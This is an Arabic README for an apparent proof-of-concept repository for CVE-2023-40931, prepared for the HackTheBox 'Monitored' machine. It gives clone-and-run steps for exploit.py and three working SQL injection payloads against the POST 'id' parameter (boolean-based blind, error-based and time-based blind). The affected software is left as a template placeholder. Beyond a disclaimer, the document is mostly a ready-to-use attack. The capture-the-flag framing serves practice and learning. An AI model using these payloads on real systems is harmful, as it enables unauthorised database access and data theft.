
CVE-2023-40931 إثبات المفهوم المُعد لـ HTB MONITORED
يحتوي هذا المستودع على إثبات المفهوم (PoC) لـ CVE-2023-40931، وهي ثغرة أمنية تم تحديدها في [البرنامج/النظام المتأثر]. الغرض من هذا المستودع هو إظهار الثغرة لأغراض تعليمية وبحثية فقط. 🛠️
هذا المشروع مخصص للأغراض التعليمية والاختبار المصرح به فقط. قد يؤدي سوء استخدام هذا الكود إلى عواقب قانونية. المؤلفون غير مسؤولين عن أي سوء استخدام أو ضرر ناتج عن هذا الكود. احرص دائمًا على الحصول على التصريح المناسب قبل اختبار أي نظام. 🔒
لمزيد من المعلومات، راجع الإدخال الرسمي لـ CVE: CVE-2023-40931. 🔗
استنساخ المستودع:
git clone https://github.com/yourusername/CVE-2023-40931-POC.git
cd CVE-2023-40931-POC
python3 exploit.py
معامل POST 'id' معرض للخطر. الحمولات التالية نجحت في استغلال الثغرة:
أعمى قائم على القيم المنطقية (Boolean-based blind): تستخدم هذه الحمولة جملة شرطية لتحديد القيمة المنطقية لاستعلام، مما يسمح باستخراج البيانات من خلال المنطق المنطقي.
action=acknowledge_banner_message&id=(SELECT (CASE WHEN (2064=2064) THEN 3 ELSE (SELECT 4367 UNION SELECT 3803) END))قائم على الأخطاء (Error-based): تستغل هذه الحمولة رسائل خطأ قاعدة البيانات لاستخراج المعلومات عن طريق إثارة أخطاء محددة.
action=acknowledge_banner_message&id=3 OR (SELECT 9867 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(9867=9867,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)أعمى قائم على الوقت (Time-based blind): تستخدم هذه الحمولة تأخيرات زمنية لاستنتاج المعلومات من خلال ملاحظة وقت استجابة الخادم.
action=acknowledge_banner_message&id=3 AND (SELECT 9475 FROM (SELECT(SLEEP(5)))Robc)تُظهر هذه الحمولات قابلية الثغرة لهجمات حقن SQL. تابع بحذر وتأكد من الحصول على التصريح المناسب قبل الاختبار. 🔒
اتبع التعليمات الموجودة في ملف exploit.py لتنفيذ إثبات المفهوم. 🧑💻
ملاحظة: تأكد من تثبيت التبعيات المطلوبة. ✅